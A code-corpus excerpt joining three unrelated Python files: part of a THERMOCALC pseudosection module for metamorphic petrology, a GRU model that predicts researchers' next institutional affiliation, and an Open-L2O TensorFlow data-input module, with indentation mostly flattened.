instr (str): String to be passed to standard input for session.
Returns:
str: THERMOCALC standard output
"""
if sys.platform.startswith('win'):
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = 1
startupinfo.wShowWindow = 0
else:
startupinfo = None
p = subprocess.Popen(str(self.tcexe), cwd=str(self.workdir), startupinfo=startupinfo, **popen_kw)
output, err = p.communicate(input=instr.encode(self.TCenc))
if err is not None:
print(err.decode('utf-8'))
sys.stdout.flush()
return output.decode(self.TCenc)
def rundr(self):
"""Method to run drawpd."""
if self.drexe:
instr = self.name + '\n'
if sys.platform.startswith('win'):
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = 1
startupinfo.wShowWindow = 0
else:
startupinfo = None
p = subprocess.Popen(str(self.drexe), cwd=str(self.workdir), startupinfo=startupinfo, **popen_kw)
p.communicate(input=instr.encode(self.TCenc))
sys.stdout.flush()
return True
else:
print('No drawpd executable identified in working directory.')
return False
class TCResult():
def __init__(self, T, p, variance=0, c=0, data={}, ptguess=['']):
self.data = data
self.ptguess = ptguess
self.T = T
self.p = p
self.variance = variance
self.c = c
@classmethod
def from_block(cls, block, ptguess):
info, ax, sf, bulk, rbi, mode, factor, td, sys, *mems, pems = block.split('\n\n')
if 'var = 2; seen' in info:
# no step in bulk
info, ax, sf, rbi, mode, factor, td, sys, *mems, pems = block.split('\n\n')
bulk = '\n'.join(rbi.split('\n')[:3])
rbi = '\n'.join(rbi.split('\n')[3:])
# heading
data = {phase: {} for phase in info.split('{')[0].split()}
p, T = (float(v.strip()) for v in info.split('{')[1].split('}')[0].split(','))
# var or ovar?
variance = int(info.split('var = ')[1].split(' ')[0].replace(';', ''))
# a-x variables
for head, vals in zip(ax.split('\n')[::2], ax.split('\n')[1::2]):
phase, *names = head.split()
data[phase].update({name.replace('({})'.format(phase), ''): float(val) for name, val in zip(names, vals.split())})
# site fractions
for head, vals in zip(sf.split('\n')[1::2], sf.split('\n')[2::2]): # skip site fractions row
phase, *names = head.split()
data[phase].update({name: float(val) for name, val in zip(names, vals.split())})
# bulk composition
bulk_vals = {}
oxhead, vals = bulk.split('\n')[1:] # skip oxide compositions row
for ox, val in zip(oxhead.split(), vals.split()[1:]):
bulk_vals[ox] = float(val)
data['bulk'] = bulk_vals
# x for TX and pX
if 'step' in vals:
c = float(vals.split('step')[1].split(', x =')[1])
else:
c = 0
# rbi
for row in rbi.split('\n'):
phase, *vals = row.split()
data[phase].update({ox: float(val) for ox, val in zip(oxhead.split(), vals)})
# modes (zero mode is empty field in tc350 !!!)
head, vals = mode.split('\n')
phases = head.split()[1:]
        # fixed-width parsing: skip the 6-character row label, then read one 12-character column per phase
valsf = [float(vals[6:][12 * i:12 * (i + 1)].strip()) if vals[6:][12 * i:12 * (i + 1)].strip() != '' else 0.0 for i in range(len(phases))]
for phase, val in zip(phases, valsf):
data[phase].update({'mode': float(val)})
# factors
head, vals = factor.split('\n')
phases = head.split()[1:]
valsf = [float(vals[6:][12 * i:12 * (i + 1)].strip()) if vals[6:][12 * i:12 * (i + 1)].strip() != '' else 0.0 for i in range(len(phases))]
for phase, val in zip(phases, valsf):
data[phase].update({'factor': float(val)})
# thermodynamic state
head, *rows = td.split('\n')
for row in rows:
phase, *vals = row.split()
data[phase].update({name: float(val) for name, val in zip(head.split(), vals)})
# bulk thermodynamics
sys = {}
for name, val in zip(head.split(), row.split()[1:]):
sys[name] = float(val)
data['sys'] = sys
# model end-members
if len(mems) > 0:
_, mem0 = mems[0].split('\n', maxsplit=1)
head = ['ideal', 'gamma', 'activity', 'prop', 'mu', 'RTlna']
mems[0] = mem0
for mem in mems:
ems = mem.split('\n')
phase, ems0 = ems[0].split(maxsplit=1)
ems[0] = ems0
for row in ems:
em, *vals = row.split()
phase_em = '{}({})'.format(phase, em)
data[phase_em] = {name: float(val) for name, val in zip(head, vals)}
# pure end-members
for row in pems.split('\n')[:-1]:
pem, val = row.split()
data[pem].update({'mu': float(val)})
# Finally
return cls(T, p, variance=variance, c=c, data=data, ptguess=ptguess)
def __repr__(self):
return 'p:{:g} T:{:g} V:{} c:{:g}, Phases: {}'.format(self.p, self.T, self.variance, self.c, ' '.join(self.phases))
def __getitem__(self, key):
if isinstance(key, str):
if key not in self.phases:
                raise IndexError('The index ({}) does not exist.'.format(key))
return self.data[key]
else:
raise TypeError('Invalid argument type.')
@property
def phases(self):
return set(self.data.keys())
def rename_phase(self, old, new):
self.data[new] = self.data.pop(old)
for ix, ln in enumerate(self.ptguess):
self.ptguess[ix] = ln.replace('({})'.format(old), '({})'.format(new))
class TCResultSet:
def __init__(self, results):
self.results = results
def __repr__(self):
return '{} results'.format(len(self.results))
def __len__(self):
return len(self.results)
def __getitem__(self, key):
if isinstance(key, slice):
# Get the start, stop, and step from the slice
return TCResultSet(self.results[key])
elif isinstance(key, int):
if key < 0: # Handle negative indices
key += len(self.results)
if key < 0 or key >= len(self.results):
raise IndexError('The index ({}) is out of range.'.format(key))
return self.results[key]
elif isinstance(key, list):
return TCResultSet([self.results[ix] for ix in key])
else:
raise TypeError('Invalid argument type.')
@property
def x(self):
return np.array([res.T for res in self.results])
@property
def y(self):
return np.array([res.p for res in self.results])
@property
def variance(self):
return self.results[0].variance
@property
def c(self):
return np.array([res.c for res in self.results])
@property
def phases(self):
return self.results[0].phases
def ptguess(self, ix):
try:
return self.results[ix].ptguess
except Exception:
return None
def rename_phase(self, old, new):
for r in self.results:
r.rename_phase(old, new)
def insert(self, ix, result):
self.results.insert(ix, result)
class Dogmin:
def __init__(self, **kwargs):
assert 'output' in kwargs, 'Dogmin output must be provided'
assert 'resic' in kwargs, 'ic file content must be provided'
self.id = kwargs.get('id', 0)
self.output = kwargs.get('output').split('##########################################################\n')[-1]
self.resic = kwargs.get('resic')
self.phases = set(self.output.split('assemblage')[1].split('\n')[0].split())
self.x = kwargs.get('x', None)
self.y = kwargs.get('y', None)
@property
def out(self):
return set()
def label(self, excess={}):
"""str: full label with space delimeted phases."""
return ' '.join(sorted(list(self.phases.difference(excess))))
def annotation(self, show_out=False, excess={}):
"""str: String representation of ID with possible zermo mode phase."""
if show_out:
return self.label(excess=excess)
else:
return '{:d}'.format(self.id)
def ptguess(self):
block = [ln for ln in self.output.splitlines() if ln != '']
xyz = [ix for ix, ln in enumerate(block) if ln.startswith('xyzguess')]
gixs = [ix for ix, ln in enumerate(block) if ln.startswith('ptguess')][0] - 1
gixe = xyz[-1] + 2
return block[gixs:gixe]
class PseudoBase:
"""Base class with common methods for InvPoint and UniLine.
"""
def label(self, excess={}):
"""str: full label with space delimeted phases - zero mode phase."""
phases_lbl = ' '.join(sorted(list(self.phases.difference(excess))))
out_lbl = ' '.join(sorted(list(self.out)))
return '{} - {}'.format(phases_lbl, out_lbl)
def annotation(self, show_out=False):
"""str: String representation of ID with possible zermo mode phase."""
if show_out:
return '{:d} {}'.format(self.id, ' '.join(self.out))
else:
return '{:d}'.format(self.id)
def ptguess(self, **kwargs):
"""list: Get stored ptguesses.
InvPoint has just single ptguess, but for UniLine idx need to be
specified. If omitted, the middle point from calculated ones is used.
Args:
idx (int): index which guesses to get.
"""
idx = kwargs.get('idx', self.midix)
return self.results[idx].ptguess
def datakeys(self, phase=None):
"""list: Get list of variables for phase.
Args:
phase (str): name of phase
"""
if phase is None:
return list(self.results[self.midix].data.keys())
else:
return list(self.results[self.midix].data[phase].keys())
class InvPoint(PseudoBase):
"""Class to store invariant point
Attributes:
id (int): Invariant point identification
phases (set): set of present phases
out (set): set of zero mode phases
cmd (str): THERMOCALC standard input to calculate this point
variance (int): variance
x (numpy.array): Array of x coordinates
(even if only one, it is stored as array)
        y (numpy.array): Array of y coordinates
(even if only one, it is stored as array)
        results (list): List of results dicts with data and ptguess keys.
output (str): Full THERMOCALC output
        manual (bool): True when invariant point is user-defined and not
calculated
"""
def __init__(self, **kwargs):
assert 'phases' in kwargs, 'Set of phases must be provided'
assert 'out' in kwargs, 'Set of zero phase must be provided'
self.id = kwargs.get('id', 0)
self.phases = kwargs.get('phases')
self.out = kwargs.get('out')
self.cmd = kwargs.get('cmd', '')
self.variance = kwargs.get('variance', 0)
self.x = kwargs.get('x', [])
self.y = kwargs.get('y', [])
self.results = kwargs.get('results', None)
self.output = kwargs.get('output', 'User-defined')
self.manual = kwargs.get('manual', False)
def __repr__(self):
return 'Inv: {}'.format(self.label())
@property
def midix(self):
return 0
@property
def _x(self):
"""X coordinate as float"""
return self.x[0]
@property
def _y(self):
"""Y coordinate as float"""
return self.y[0]
def shape(self):
"""Return shapely Point representing invariant point."""
return Point(self._x, self._y)
def all_unilines(self):
"""Return four tuples (phases, out) indicating possible four
        univariant lines passing through this invariant point"""
a, b = self.out
aset, bset = set([a]), set([b])
aphases, bphases = self.phases.difference(aset), self.phases.difference(bset)
# Check for polymorphs
fix = False
for poly in polymorphs:
if poly.issubset(self.phases):
fix = True
break
if fix and (poly != self.out): # on boundary
yespoly = poly.intersection(self.out)
nopoly = self.out.difference(yespoly)
aphases = self.phases.difference(yespoly)
bphases = self.phases.difference(poly.difference(self.out))
return((aphases, nopoly),
(bphases, nopoly),
(self.phases, yespoly),
(self.phases.difference(nopoly), yespoly))
else:
return((self.phases, aset),
(self.phases, bset),
(bphases, aset),
(aphases, bset))
class UniLine(PseudoBase):
"""Class to store univariant line
Attributes:
id (int): Invariant point identification
phases (set): set of present phases
out (set): set of zero mode phase
cmd (str): THERMOCALC standard input to calculate this point
variance (int): variance
_x (numpy.array): Array of x coordinates (all calculated)
        _y (numpy.array): Array of y coordinates (all calculated)
        results (list): List of results dicts with data and ptguess keys.
output (str): Full THERMOCALC output
        manual (bool): True when univariant line is user-defined and not
calculated
        begin (int): id of invariant point defining beginning of the line.
0 for no begin
end (int): id of invariant point defining end of the line.
0 for no end
        used (slice): slice indicating which points on the calculated line are
between begin and end
"""
def __init__(self, **kwargs):
assert 'phases' in kwargs, 'Set of phases must be provided'
assert 'out' in kwargs, 'Set of zero phase must be provided'
self.id = kwargs.get('id', 0)
self.phases = kwargs.get('phases')
self.out = kwargs.get('out')
self.cmd = kwargs.get('cmd', '')
self.variance = kwargs.get('variance', 0)
self._x = kwargs.get('x', np.array([]))
self._y = kwargs.get('y', np.array([]))
self.results = kwargs.get('results', None)
self.output = kwargs.get('output', 'User-defined')
self.manual = kwargs.get('manual', False)
self.begin = kwargs.get('begin', 0)
self.end = kwargs.get('end', 0)
self.used = slice(0, len(self._x))
self.x = self._x.copy()
self.y = self._y.copy()
def __repr__(self):
return 'Uni: {}'.format(self.label())
@property
def midix(self):
return int((self.used.start + self.used.stop) // 2)
@property
def connected(self):
return 2 - [self.begin, self.end].count(0)
def _shape(self, ratio=None, tolerance=None):
"""Return shapely LineString representing univariant line.
This method is using all calculated points.
Args:
ratio: y-coordinate multiplier to scale coordinates. Default None
            tolerance: simplification tolerance in x coordinates. Simplified object will be within
the tolerance distance of the original geometry. Default None
"""
if ratio is None:
return LineString(np.array([self._x, self._y]).T)
else:
if tolerance is None:
return LineString(np.array([self._x, self._y]).T)
else:
ln = LineString(np.array([self._x, ratio * self._y]).T).simplify(tolerance)
x, y = np.array(ln.coords).T
return LineString(np.array([x, y / ratio]).T)
def shape(self, ratio=None, tolerance=None):
"""Return shapely LineString representing univariant line.
This method is using trimmed points.
Args:
ratio: y-coordinate multiplier to scale coordinates. Default None
            tolerance: simplification tolerance in x coordinates. Simplified object will be within
the tolerance distance of the original geometry. Default None
"""
if ratio is None:
return LineString(np.array([self.x, self.y]).T)
else:
if tolerance is None:
return LineString(np.array([self.x, self.y]).T)
else:
ln = LineString(np.array([self.x, ratio * self.y]).T).simplify(tolerance)
x, y = np.array(ln.coords).T
return LineString(np.array([x, y / ratio]).T)
def contains_inv(self, ip):
"""Check whether invariant point theoretically belong to univariant line.
Args:
ip (InvPoint): Invariant point
Returns:
bool: True for yes, False for no. Note that metastability is not checked.
"""
def checkme(uphases, uout, iphases, iout):
a, b = iout
aset, bset = set([a]), set([b])
aphases, bphases = iphases.difference(aset), iphases.difference(bset)
candidate = False
if iphases == uphases and len(iout.difference(uout)) == 1:
candidate = True
if bphases == uphases and aset == uout:
candidate = True
if aphases == uphases and bset == uout:
candidate = True
return candidate
# Check for polymorphs
fixi, fixu = False, False
for poly in polymorphs:
if poly.issubset(ip.phases) and (poly != ip.out) and (not ip.out.isdisjoint(poly)):
fixi = True
if poly.issubset(self.phases) and not self.out.isdisjoint(poly):
fixu = True
break
# check invs
candidate = checkme(self.phases, self.out, ip.phases, ip.out)
if fixi and not candidate:
candidate = checkme(self.phases, self.out, ip.phases, ip.out.difference(poly).union(poly.difference(ip.out)))
if fixu and not candidate:
candidate = checkme(self.phases, poly.difference(self.out), ip.phases, ip.out)
return candidate
def get_label_point(self):
"""Returns coordinate tuple of labeling point for univariant line."""
if len(self.x) > 1:
dx = np.diff(self.x)
dy = np.diff(self.y)
d = np.sqrt(dx**2 + dy**2)
sd = np.sum(d)
if sd > 0:
cl = np.append([0], np.cumsum(d))
ix = np.interp(sd / 2, cl, range(len(cl)))
cix = int(ix)
return self.x[cix] + (ix - cix) * dx[cix], self.y[cix] + (ix - cix) * dy[cix]
else:
return self.x[0], self.y[0]
else:
return self.x[0], self.y[0]
class SectionBase:
"""Base class for PTsection, TXsection and PX section
"""
def __init__(self, **kwargs):
self.excess = kwargs.get('excess', set())
self.invpoints = {}
self.unilines = {}
self.dogmins = {}
def __repr__(self):
return '\n'.join(['{}'.format(type(self).__name__),
'Univariant lines: {}'.format(len(self.unilines)),
'Invariant points: {}'.format(len(self.invpoints)),
'{} range: {} {}'.format(self.x_var, *self.xrange),
'{} range: {} {}'.format(self.y_var, *self.yrange)])
@property
def ratio(self):
return (self.xrange[1] - self.xrange[0]) / (self.yrange[1] - self.yrange[0])
@property
def range_shapes(self):
# default p-t range boundary
bnd = [LineString([(self.xrange[0], self.yrange[0]),
(self.xrange[1], self.yrange[0])]),
LineString([(self.xrange[1], self.yrange[0]),
(self.xrange[1], self.yrange[1])]),
LineString([(self.xrange[1], self.yrange[1]),
(self.xrange[0], self.yrange[1])]),
LineString([(self.xrange[0], self.yrange[1]),
(self.xrange[0], self.yrange[0])])]
return bnd, next(polygonize(bnd))
def add_inv(self, id, inv):
if inv.manual:
inv.results = None
else: # temporary compatibility with 2.2.0
if not isinstance(inv.results, TCResultSet):
inv.results = TCResultSet([TCResult(float(x), float(y), variance=inv.variance,
data=r['data'], ptguess=r['ptguess'])
for r, x, y in zip(inv.results, inv.x, inv.y)])
self.invpoints[id] = inv
self.invpoints[id].id = id
def add_uni(self, id, uni):
if uni.manual:
uni.results = None
else: # temporary compatibility with 2.2.0
if not isinstance(uni.results, TCResultSet):
uni.results = TCResultSet([TCResult(float(x), float(y), variance=uni.variance,
data=r['data'], ptguess=r['ptguess'])
for r, x, y in zip(uni.results, uni._x, uni._y)])
self.unilines[id] = uni
self.unilines[id].id = id
def add_dogmin(self, id, dgm):
self.dogmins[id] = dgm
self.dogmins[id].id = id
def cleanup_data(self):
for id_uni, uni in self.unilines.items():
if not uni.manual:
keep = slice(max(uni.used.start - 1, 0), min(uni.used.stop + 1, len(uni._x)))
uni._x = uni._x[keep]
uni._y = uni._y[keep]
uni.results = uni.results[keep]
else:
uni.cmd = ''
uni.variance = 0
uni._x = np.array([])
uni._y = np.array([])
uni.results = [dict(data=None, ptguess=None)]
uni.output = 'User-defined'
uni.used = slice(0, 0)
uni.x = np.array([])
uni.y = np.array([])
self.trim_uni(id_uni)
def getidinv(self, inv=None):
'''Return id of either new or existing invariant point'''
ids = 0
# collect polymorphs identities
if inv is not None:
outs = [inv.out]
for poly in polymorphs:
if poly.issubset(inv.phases):
switched = inv.out.difference(poly).union(poly.difference(inv.out))
if switched:
outs.append(switched)
for iid, cinv in self.invpoints.items():
if inv is not None:
if cinv.phases == inv.phases:
if cinv.out in outs:
inv.out = cinv.out # switch to already used ??? Needed ???
return False, iid
ids = max(ids, iid)
return True, ids + 1
def getiduni(self, uni=None):
'''Return id of either new or existing univariant line'''
ids = 0
# collect polymorphs identities
if uni is not None:
outs = [uni.out]
for poly in polymorphs:
if poly.issubset(uni.phases):
outs.append(poly.difference(uni.out))
for uid, cuni in self.unilines.items():
if uni is not None:
if cuni.phases == uni.phases:
if cuni.out in outs:
uni.out = cuni.out # switch to already used ??? Needed ???
return False, uid
ids = max(ids, uid)
return True, ids + 1
def trim_uni(self, id):
uni = self.unilines[id]
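        # Project the begin/end invariant points onto the calculated line and keep
        # only the calculated vertices that lie between the two projections.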
if not uni.manual:
if uni.begin > 0:
p1 = Point(self.invpoints[uni.begin].x,
self.ratio * self.invpoints[uni.begin].y)
else:
p1 = Point(uni._x[0], self.ratio * uni._y[0])
if uni.end > 0:
p2 = Point(self.invpoints[uni.end].x,
self.ratio * self.invpoints[uni.end].y)
else:
p2 = Point(uni._x[-1], self.ratio * uni._y[-1])
#
xy = np.array([uni._x, self.ratio * uni._y]).T
line = LineString(xy)
# vertex distances
vdst = np.array([line.project(Point(*v)) for v in xy])
d1 = line.project(p1)
d2 = line.project(p2)
# switch if needed
if d1 > d2:
d1, d2 = d2, d1
uni.begin, uni.end = uni.end, uni.begin
# get slice of points to keep
uni.used = slice(np.flatnonzero(vdst >= d1)[0].item(),
np.flatnonzero(vdst <= d2)[-1].item() + 1)
# concatenate begin, keep, end
if uni.begin > 0:
x1, y1 = self.invpoints[uni.begin].x, self.invpoints[uni.begin].y
else:
x1, y1 = [], []
if uni.end > 0:
x2, y2 = self.invpoints[uni.end].x, self.invpoints[uni.end].y
else:
x2, y2 = [], []
if not uni.manual:
xx = uni._x[uni.used]
yy = uni._y[uni.used]
else:
xx, yy = [], []
# store trimmed
uni.x = np.hstack((x1, xx, x2))
uni.y = np.hstack((y1, yy, y2))
def create_shapes(self, tolerance=None):
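        # Build the multivariant field polygons: clip each univariant line to the
        # axes rectangle, split the rectangle boundary at the intersections,
        # polygonize everything and assign a phase assemblage to each polygon.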
def splitme(seg):
'''Recursive boundary splitter'''
s_seg = []
for _, l in lns:
if seg.intersects(l):
m = linemerge([seg, l])
if m.type == 'MultiLineString':
p = seg.intersection(l)
p_ok = l.interpolate(l.project(p)) # fit intersection to line
t_seg = LineString([Point(seg.coords[0]), p_ok])
if t_seg.is_valid:
s_seg.append(t_seg)
t_seg = LineString([p_ok, Point(seg.coords[-1])])
if t_seg.is_valid:
s_seg.append(t_seg)
break
if len(s_seg) == 2:
return splitme(s_seg[0]) + splitme(s_seg[1])
else:
return [seg]
# define bounds and area
bnd, area = self.range_shapes
lns = []
log = []
# trim univariant lines
for uni in self.unilines.values():
ln = area.intersection(uni.shape(ratio=self.ratio, tolerance=tolerance))
if ln.type == 'LineString' and not ln.is_empty:
lns.append((uni.id, ln))
if ln.type == 'MultiLineString':
for ln_part in ln:
if ln_part.type == 'LineString' and not ln_part.is_empty:
lns.append((uni.id, ln_part))
# split boundaries
edges = splitme(bnd[0]) + splitme(bnd[1]) + splitme(bnd[2]) + splitme(bnd[3])
# polygonize
polys = list(polygonize(edges + [l for _, l in lns]))
# create shapes
shapes = {}
unilists = {}
for ix, poly in enumerate(polys):
unilist = []
for uni_id, ln in lns:
if ln.relate_pattern(poly, '*1*F*****'):
unilist.append(uni_id)
phases = set.intersection(*(self.unilines[id].phases for id in unilist))
            vd = [phases.symmetric_difference(self.unilines[id].phases) == self.unilines[id].out
                  or not phases.symmetric_difference(self.unilines[id].phases)
                  or phases.symmetric_difference(self.unilines[id].phases).union(self.unilines[id].out) in polymorphs
                  for id in unilist]
if all(vd):
if frozenset(phases) in shapes:
# multivariant field crossed just by single univariant line
if len(unilist) == 1:
if self.unilines[unilist[0]].out.issubset(phases):
phases = phases.difference(self.unilines[unilist[0]].out)
shapes[frozenset(phases)] = poly
unilists[frozenset(phases)] = unilist
elif len(unilists[frozenset(phases)]) == 1:
if self.unilines[unilists[frozenset(phases)][0]].out.issubset(phases):
orig_unilist = unilists[frozenset(phases)]
shapes[frozenset(phases)] = poly
unilists[frozenset(phases)] = unilist
phases = phases.difference(self.unilines[orig_unilist[0]].out)
shapes[frozenset(phases)] = poly
unilists[frozenset(phases)] = orig_unilist
else:
shapes[frozenset(phases)] = shapes[frozenset(phases)].union(poly).buffer(0.00001)
log.append('Area defined by unilines {} is self-intersecting with {}.'.format(' '.join([str(id) for id in unilist]), ' '.join([str(id) for id in unilists[frozenset(phases)]])))
unilists[frozenset(phases)] = list(set(unilists[frozenset(phases)] + unilist))
else:
shapes[frozenset(phases)] = poly
unilists[frozenset(phases)] = unilist
else:
log.append('Area defined by unilines {} is not valid field.'.format(' '.join([str(id) for id in unilist])))
return shapes, unilists, log
def show(self):
for ln in self.unilines.values():
plt.plot(ln.x, ln.y, 'k-')
for ln in self.invpoints.values():
plt.plot(ln.x, ln.y, 'ro')
plt.xlim(self.xrange)
plt.ylim(self.yrange)
plt.xlabel(self.x_var_label)
plt.xlabel(self.y_var_label)
plt.show()
@staticmethod
def read_file(projfile):
with gzip.open(str(projfile), 'rb') as stream:
data = pickle.load(stream)
return data
@staticmethod
def from_file(projfile):
with gzip.open(str(projfile), 'rb') as stream:
data = pickle.load(stream)
return data['section']
class PTsection(SectionBase):
"""P-T pseudosection class
"""
def __init__(self, **kwargs):
self.xrange = kwargs.get('trange', (200., 1000.))
self.yrange = kwargs.get('prange', (0.1, 20.))
self.x_var = 'T'
self.x_var_label = 'Temperature [C]'
self.x_var_res = 0.01
self.y_var = 'p'
self.y_var_label = 'Pressure [kbar]'
self.y_var_res = 0.001
super(PTsection, self).__init__(**kwargs)
class TXsection(SectionBase):
"""T-X pseudosection class
"""
def __init__(self, **kwargs):
self.xrange = kwargs.get('trange', (200., 1000.))
self.yrange = (0., 1.)
self.x_var = 'T'
self.x_var_label = 'Temperature [C]'
self.x_var_res = 0.01
self.y_var = 'C'
self.y_var_label = 'Composition'
self.y_var_res = 0.001
super(TXsection, self).__init__(**kwargs)
class PXsection(SectionBase):
"""P-X pseudosection class
"""
def __init__(self, **kwargs):
self.xrange = (0., 1.)
self.yrange = kwargs.get('prange', (0.1, 20.))
self.x_var = 'C'
self.x_var_label = 'Composition'
self.x_var_res = 0.001
self.y_var = 'p'
self.y_var_label = 'Pressure [kbar]'
self.y_var_res = 0.001
super(PXsection, self).__init__(**kwargs)
``` |
{
"source": "JohnyWang97/Bachelors-project",
"score": 3
} |
#### File: Bachelors-project/src/jobhopping.py
```python
import pickle
import os
import torch
import torch.nn as nn
import heapq
import numpy as np
from src.config import model_path
import torch.nn.functional as F
# use the GPU for computation
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
# set the model import path
data_path = os.path.join(model_path, 'jobhopping')
# recurrent neural network parameter settings
class GRUfn(nn.Sequential):
def __init__(self, input_size, hidden_size, output_size):
super(GRUfn, self).__init__()
self.hidden_size = hidden_size
self.input_size = input_size
self.sig = nn.Sigmoid()
self.cr = nn.GRU(input_size=input_size, hidden_size=hidden_size)
self.fn = nn.Linear(hidden_size, output_size)
self.fn2 = nn.Linear(hidden_size, output_size)
def forward(self, x, y=None, batch=256):
if y is not None:
x, y = self.cr(x, y)
else:
x, y = self.cr(x)
x = torch.nn.utils.rnn.pad_packed_sequence(x)
        # swap the first and second dimensions of the padded output x (time and batch)
r = torch.transpose(x[0], 0, 1)
y = y.view(batch, self.hidden_size)
ind = x[1].view(batch, 1, 1)
ind = ind - 1
ind = ind.expand(-1, -1, self.hidden_size)
t = torch.gather(r, 1, ind)
t = t.view(batch, self.hidden_size)
t = self.fn(t)
y = self.fn2(y)
t = t + y
t = self.sig(t)
return t
class JobHopping:
def __init__(self):
self._id2name = {}
self._name2id = {}
self._model_data = torch.load(os.path.join(data_path, 'model'))
self._affi = self._model_data['affi_tensor']
with open(os.path.join(data_path, 'orgID2orgname'), 'rb') as file:
_data = pickle.load(file)
for i, v in enumerate(_data):
self._id2name[i] = v.split('+')[0]
self._name2id.setdefault(v.split('+')[0], i)
self._INPUT_DIM = 128
self._OUTPUT_DIM = len(self._id2name.keys())
self._model = GRUfn(self._INPUT_DIM, 512, self._OUTPUT_DIM)
self._model.load_state_dict(self._model_data['state_dict'])
def predict(self, name_squence, ntop=5):
name_squence = [x.lower() for x in name_squence]
name2id_squence = [self._name2id[name] for name in name_squence if name in self._name2id.keys()]
# if len(name_squence) != len(name2id_squence):
# return None
temp_squence = name2id_squence
name2id_squence = []
if len(temp_squence) != 0:
name2id_squence.append(temp_squence[0])
            for index, term in enumerate(temp_squence):
                if index != 0 and term != temp_squence[index - 1]:
                    name2id_squence.append(term)
else:
return None
        # remove repeated cycles from the sequence
name2id_squence = self._delete_ring(name2id_squence)
zb = self._id2PackedSequence(name2id_squence)
fout = self._model(zb, batch=1)
# softmax_fout = F.softmax(fout,1)
# ans = heapq.nlargest(ntop, enumerate(softmax_fout.data.numpy()[0]), key=lambda x:x[1])
ans = heapq.nlargest(ntop, enumerate(fout.data.numpy()[0]), key=lambda x:x[1])
ret = []
for id, p in ans:
ret.append({
'name': self._id2name[id],
'p': p,
})
#self._softmax(ret)
return ret
def _delete_ring(self,id_squence):
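        # Repeatedly find the longest repeated sub-sequence (longest common
        # substring of the sequence with itself) and collapse its repetitions
        # until no repeat of length >= 2 remains.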
clear_squence = id_squence
        times = 1000
while True:
res = self._getNumofCommonSubstr(clear_squence, clear_squence)
if res[1] < 2:
break
a = "_".join([str(ss) for ss in res[0]])
b = "_".join([str(ss) for ss in clear_squence])
temp = b
times = 1000
while times > 1:
if b.rfind(a) != -1:
temp = b
b = self._rreplace(b, a, "_", 1)
times -= 1
else:
break
clear_squence = [int(term) for term in temp.split("_") if term != ""]
# id_squence = [int(s) for s in clear_squence]
# clear_squence = id_squence
return clear_squence
def _getNumofCommonSubstr(self,str1, str2):
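        # Classic dynamic-programming longest-common-substring search; the
        # abs(i - j) > maxNum condition keeps the two matched occurrences from
        # overlapping when the sequence is compared with itself.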
lstr1 = len(str1)
lstr2 = len(str2)
        record = [[0 for i in range(lstr2 + 1)] for j in range(lstr1 + 1)]  # DP table with one extra row and column
        maxNum = 0  # length of the longest match
        p = 0  # end position of the longest match in str1
for i in range(lstr1):
for j in range(lstr2):
if str1[i] == str2[j] and abs(i - j) > maxNum:
                    # characters match: extend the current run
record[i + 1][j + 1] = record[i][j] + 1
if record[i + 1][j + 1] > maxNum:
                        # update the maximum match length
maxNum = record[i + 1][j + 1]
                        # record the end position of the longest match
p = i + 1
# return p - maxNum,p, maxNum
return str1[p - maxNum:p], maxNum
def _rreplace(self,st, old, new, *max):
count = len(st)
if max and str(max[0]).isdigit():
count = max[0]
return new.join(st.rsplit(old, count))
def _id2PackedSequence(self, affi_id):
        # The input shape can be (T x B x *): T is the longest sequence length, B is the batch size,
        # and * is any number of trailing dimensions (possibly 0). With batch_first=True the input shape is (B x T x *).
ret = torch.zeros(1, len(affi_id), self._INPUT_DIM)
indices = torch.tensor(affi_id, device='cpu', dtype=torch.long)
ret[0] = torch.index_select(self._affi, 0, indices)
return torch.nn.utils.rnn.pack_padded_sequence(ret, [len(affi_id)],batch_first=True)
def _softmax(self, affis):
# Softmax is a generalization of logistic function that "squashes"(maps) a vector of arbitrary real values to a vector of real values in the range (0, 1) that add up to 1.
s = sum(map(lambda x: np.exp(x['p']), affis))
for dict in affis:
dict['p'] = round(np.exp(dict['p'])/s, 2)
j = JobHopping()
print('Result')
print(j.predict(['university of oxford','university of california berkeley','university of cambridge']))
``` |
{
"source": "JohnZ03/Open-L2O",
"score": 3
} |
#### File: Open-L2O/Model_Base_L2O/data_preprocessing.py
```python
import os
import numpy as np
import tensorflow.compat.v2 as tf
# _SHUFFLE_BUFFER = 51200
def dataset_parser(value, A):
"""Parse an ImageNet record from a serialized string Tensor."""
# return value[:A.shape[0]], value[A.shape[0]:]
return value[:A.shape[0]], value
def process_record_dataset(dataset,
is_training,
batch_size,
shuffle_buffer,
drop_remainder=False,
A=None):
"""Given a Dataset with raw records, return an iterator over the records.
Args:
dataset: A Dataset representing raw records
is_training: A boolean denoting whether the input is for training.
batch_size: The number of samples per batch.
shuffle_buffer: The buffer size to use when shuffling records. A larger
value results in better randomness, but smaller values reduce startup time
and use less memory.
    drop_remainder: A boolean indicating whether to drop the remainder of the
batches. If True, the batch dimension will be static.
Returns:
    Dataset of (measurement, record) pairs ready for iteration.
"""
if is_training:
# Shuffles records before repeating to respect epoch boundaries.
dataset = dataset.shuffle(buffer_size=shuffle_buffer)
# Repeats the dataset for the number of epochs to train.
dataset = dataset.repeat()
# Use a private thread pool and limit intra-op parallelism. Enable
# non-determinism only for training.
options = tf.data.Options()
options.experimental_threading.max_intra_op_parallelism = 1
options.experimental_threading.private_threadpool_size = 16
options.experimental_deterministic = False
dataset = dataset.with_options(options)
dataset = dataset.apply(
tf.data.experimental.map_and_batch(
lambda x: dataset_parser(x, A),
batch_size=batch_size,
num_parallel_batches=2,
drop_remainder=drop_remainder))
dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
return dataset
def input_fn(is_training,
data_dir,
batch_size,
task='sc',
input_context=None,
drop_remainder=False,
A=None,
filename=None):
"""Input function which provides batches for train or eval.
Args:
is_training: A boolean denoting whether the input is for training.
data_dir: The directory containing the input data.
batch_size: The number of samples per batch.
input_context: A `tf.distribute.InputContext` object passed in by
`tf.distribute.Strategy`.
    drop_remainder: A boolean indicating whether to drop the remainder of the
batches. If True, the batch dimension will be static.
Returns:
A dataset that can be used for iteration.
"""
if filename is None:
if is_training:
# filename = task+'_train_data.npy'
filename = 'train_data.npy'
else:
# filename = task+'_val_data.npy'
filename = 'val_data.npy'
data = np.load(os.path.join(data_dir, filename), allow_pickle=True)
shuffle_buffer = 400000 if task == 'cs' else data.shape[0]
# dataset = tf.data.TFRecordDataset(os.path.join(data_dir, filename))
